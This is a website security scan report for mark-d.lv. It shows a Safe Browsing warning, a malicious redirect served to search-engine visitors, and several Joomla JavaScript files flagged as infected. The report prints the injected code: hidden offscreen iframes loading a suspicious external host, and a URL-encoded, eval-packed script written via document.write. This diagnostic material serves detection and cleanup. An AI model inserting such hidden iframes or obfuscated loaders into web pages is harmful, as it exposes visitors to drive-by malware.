Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mark-d.lv
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://mark-d.lv/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: mark-d.lv Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 18:39:32 GMT Location: http://eyqwtw.freewww.biz/yrehwegweg.cgi?3 Server: nginx admin Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://mark-d.lv/ | 200 OK Content-Length: 33469 Content-Type: text/html | clean |
http://userapi.com/js/api/openapi.js?23 | 200 OK Content-Length: 64063 Content-Type: application/x-javascript | clean |
http://stg.odnoklassniki.ru/share/odkl_share.js | 200 OK Content-Length: 12312 Content-Type: application/x-javascript | clean |
http://mark-d.lv/media/system/js/validate.js | 200 OK Content-Length: 9237 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JFormValidator = new Class({ initialize: function() { this.handlers = Object(); this.custom = Object(); this.setHandler('username', function (value) { regex = new RegExp("[\<|\>|\"|\'|\%|\;|\(|\)|\&]", "i"); return !regex.test(value); } ); this.setHandler('password', function (value) { regex=/^\S[\S ]{2,98}\S$/; return regex.test(value); ...[3861 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 101x101 src: http://eyqwtw.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://eyqwtw.freewww.biz/yrehwegweg.cgi?3"> | ||
http://mark-d.lv/templates/markd17/script.js | 200 OK Content-Length: 16046 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) cssFix = function(){ var u = navigator.userAgent.toLowerCase(), addClass = function(el, val){ if(! el.className) { el.className = val; } else { var newCl = el.className; newCl+=(' '+val); el.className = newCl; } }, is = function(t){return (u.indexOf(t)!=-1)}; addClass(document.getElementsByTagName('html')[0],[ (!(/opera|webtv/i.test(u))&&/msie (\d) ...[3901 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 101x101 src: http://eyqwtw.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://eyqwtw.freewww.biz/yrehwegweg.cgi?3"> | ||
http://connect.facebook.net/ru_RU/all.js | 200 OK Content-Length: 160536 Content-Type: application/x-javascript | clean |
http://counter.rambler.ru/top100.jcn?2452499 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://hits.puls.lv/?sid=20102&js=1 | 200 OK Content-Length: 596 Content-Type: application/javascript | clean |
http://mark-d.lv/index.php?option=com_contact&view=contact&id=1&Itemid=16&lang=ru | 200 OK Content-Length: 33673 Content-Type: text/html | clean |
http://mark-d.lv/index.php?option=com_tzmonials&view=testimonials&Itemid=11&lang=ru | 200 OK Content-Length: 46660 Content-Type: text/html | clean |
http://mark-d.lv/media/system/js/modal.js | 200 OK Content-Length: 15579 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var SqueezeBox = { presets: { size: {x: 600, y: 450}, sizeLoading: {x: 200, y: 150}, marginInner: {x: 20, y: 20}, marginImage: {x: 150, y: 200}, handler: false, adopt: null, closeWithOverlay: true, zIndex: 65555, overlayOpacity: 0.7, classWindow: '', classOverlay: '', disableFx: false, onOpen: Class.empty, onClose: Class.empty, onUpdate: Class.empty, onRe ...[3856 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 101x101 src: http://eyqwtw.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://eyqwtw.freewww.biz/yrehwegweg.cgi?3"> | ||
http://mark-d.lv/index.php?option=com_contact&view=contact&id=1&Itemid=12&lang=ru | 200 OK Content-Length: 33674 Content-Type: text/html | clean |
http://mark-d.lv/index.php?option=com_content&view=article&id=8&Itemid=15&lang=ru | 200 OK Content-Length: 32939 Content-Type: text/html | clean |
http://mark-d.lv/media/system/js/caption.js | 200 OK Content-Length: 6955 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1114 bytes skipped]... ontainer.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://eyqwtw.freewww.biz/yrehwegweg.cgi?3"></iframe>'); ;document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B ...[2108 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 101x101 src: http://eyqwtw.freewww.biz/yrehwegweg.cgi?3 This URL is marked by Google as suspicious <iframe width="51" height="51" style="width:101px;height:101px;position:absolute;left:-101px;top:0;" src="http://eyqwtw.freewww.biz/yrehwegweg.cgi?3"> | ||
http://mark-d.lv/index.php?option=com_content&view=article&id=8&Itemid=15&lang=lv | 200 OK Content-Length: 32698 Content-Type: text/html | clean |